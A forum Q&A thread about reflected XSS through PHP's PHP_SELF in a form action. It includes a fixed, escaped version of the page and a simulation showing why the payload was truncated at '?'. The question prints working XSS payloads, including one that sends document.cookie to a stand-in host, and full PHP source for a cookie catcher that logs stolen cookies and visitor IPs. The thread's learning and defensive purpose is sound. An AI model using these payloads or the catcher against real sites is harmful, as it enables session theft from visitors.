XSS URL reflection: form tag

Time: 2016-12-10 12:03:52

Tags: security cookies xss

I'm learning how XSS works and how far an attacker can go to compromise my visitors. I read on w3schools that using $_SERVER['PHP_SELF'] to echo the current file:

<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">

without htmlspecialchars() can make my application vulnerable to XSS, so I created a very basic test page on my localhost; here is the source code:

<!DOCTYPE html>
<html>
<body>

<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
  Name: <input type="text" name="fname">
  <input type="submit">
</form>

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // collect value of input field
    $name = $_REQUEST['fname'];
    if (empty($name)) {
        echo "Name is empty";
    } else {
        echo $name;
    }
}
?>

</body>
</html>

This page is vulnerable to stored XSS and reflected XSS. First I tried the following payload via the URL:

localhost:553/xss test.php/"><script>alert(1)</script>

and it popped up an alert box, all fine. I tried the same input through the form and it also worked. Then I tried to capture the cookie with PHP and wrote the following script to catch the cookie:

<?php
$cookie = $_GET['c']; // Value of the variable c passed in the URL by the HTTP GET method

$ip = getenv('REMOTE_ADDR'); // Environment variable holding the client's IP address

$date = date("j F, Y, g:i a"); // Date and time of the capture

$referer = getenv('HTTP_REFERER'); // Environment variable holding the site that redirected to the cookie catcher

$fp = fopen('kendo.html', 'a'); // Open kendo.html in append mode; the details are stored there

fwrite($fp, 'Cookie :' . $cookie . '<br/> IP :' . $ip . '<br/> Date and Time :' . $date . '<br/> Referer : ' . $referer . '<br>'); // Write the captured details to kendo.html

fclose($fp); // Close the file handle

header('Location: http://example.com/'); // Redirect the client back to a page of your choice

?>

I uploaded it to my website and tried stored XSS with the following payload:

<script>document.location="http://example.com/404.php?c=" + document.cookie</script>

where 404.php is my cookie catcher. It worked fine, but when I tried it with a URL like this:

localhost:553/xss test.php/"><script>document.location="http://www.example.com/404.php?c=" + document.cookie</script>

nothing happened, and when I looked at the source I found this:

<!DOCTYPE html>
<html>
<body>

<form method="post" action="/xss test.php/"><script>document.location="http://example.com/404.php">
  Name: <input type="text" name="fname">
  <input type="submit">
</form>


</body>
</html>

The rest of my payload was stripped. I've been looking for the root cause for 2 days but can't find it; I tried other functions like window.location and got the same result... Why does something like this happen?
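A hardened version of the test page from the question, added here as an example and not part of the original post. It escapes both reflection points (the form action built from PHP_SELF and the echoed name) with htmlspecialchars, which is the fix the question itself mentions. The HttpOnly session cookie is an added defence-in-depth assumption for the demo: it keeps document.cookie from reading the session cookie even if a script does get injected somewhere else on the site.

```php
<?php
// Added example (not the original post's code): the same page with both
// reflection points escaped. Serve it with any PHP-capable web server, for
// example `php -S localhost:8000` in the directory that contains this file.

// Escape helper: ENT_QUOTES also encodes single quotes, so the result is safe
// inside both double- and single-quoted HTML attributes as well as in text.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumption for the demo: the page keeps a session cookie. HttpOnly stops
// document.cookie from reading it, so an injected script cannot exfiltrate it.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();
?>
<!DOCTYPE html>
<html>
<body>

<!-- PHP_SELF includes attacker-controlled PATH_INFO (the part after the
     script name), so it must be escaped before being placed in an attribute. -->
<form method="post" action="<?php echo h($_SERVER['PHP_SELF']); ?>">
  Name: <input type="text" name="fname">
  <input type="submit">
</form>

<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Read from $_POST rather than $_REQUEST so that a GET parameter cannot
    // satisfy a code path that is meant to handle form submissions only.
    $name = $_POST['fname'] ?? '';
    if ($name === '') {
        echo 'Name is empty';
    } else {
        echo h($name); // escaped: "><script> is rendered as text, not markup
    }
}
?>

</body>
</html>
```

With this version, the first payload from the question (`/"><script>alert(1)</script>`) is reflected into the action attribute as `&quot;&gt;&lt;script&gt;...`, so the browser never leaves the attribute value and no script runs.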

1 answer:

Answer 0 (score: 0)

Because PHP_SELF returns the path/name of the script without the URL parameters; what happened in this case is that the '?' became a parameter.
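To make the answer concrete, here is an added command-line example (not code from the original answer) that simulates how the web server splits the request target before PHP ever sees it. The assumption it encodes is that the server cuts the request target at the first '?' (as RFC 3986 defines, and as Apache, nginx and the PHP built-in server do): the part before it becomes the decoded path that feeds PATH_INFO and PHP_SELF, the part after it becomes QUERY_STRING. Run it with `php simulate.php` (the file name is arbitrary).

```php
<?php
// Added example: simulate the server-side split of a request target into the
// values PHP later exposes as $_SERVER['PHP_SELF'] and $_SERVER['QUERY_STRING'].
// Assumption: the split happens at the first '?', and percent-escapes in the
// path are decoded (which is how PATH_INFO/PHP_SELF are populated).

function split_request_target(string $target): array {
    // explode() with a limit of 2 keeps any further '?' inside the query string.
    $parts = explode('?', $target, 2);
    return [
        'PHP_SELF'     => rawurldecode($parts[0]),
        'QUERY_STRING' => $parts[1] ?? '',
    ];
}

// Render the form tag from the question, either as the vulnerable page does
// (raw) or with the htmlspecialchars() fix applied.
function render_action(string $phpSelf, bool $escaped): string {
    $value = $escaped
        ? htmlspecialchars($phpSelf, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        : $phpSelf;
    return '<form method="post" action="' . $value . '">';
}

// Constructed inputs: the two request targets from the question.
$targets = [
    // Payload 1: contains no '?', so the whole thing ends up in PHP_SELF.
    '/xss test.php/"><script>alert(1)</script>',
    // Payload 2: the '?c=' inside the JavaScript string is also the first '?'
    // of the URL, so the server ends the path right after 404.php.
    '/xss test.php/"><script>document.location="http://example.com/404.php?c=" + document.cookie</script>',
];

foreach ($targets as $target) {
    $env = split_request_target($target);
    echo "Request target  : $target\n";
    echo "PHP_SELF        : {$env['PHP_SELF']}\n";
    echo "QUERY_STRING    : {$env['QUERY_STRING']}\n";
    echo "Unescaped action: " . render_action($env['PHP_SELF'], false) . "\n";
    echo "Escaped action  : " . render_action($env['PHP_SELF'], true) . "\n\n";
}
```

For the second target the unescaped line reproduces exactly the truncated `<form ... action="/xss test.php/"><script>document.location="http://example.com/404.php">` that the question found in the page source, while `c=" + document.cookie</script>` sits in QUERY_STRING where PHP_SELF never reflects it. The escaped line shows the same input rendered harmlessly with the fix in place. Note that a '#' would not have been the problem here, since browsers never send the fragment to the server at all.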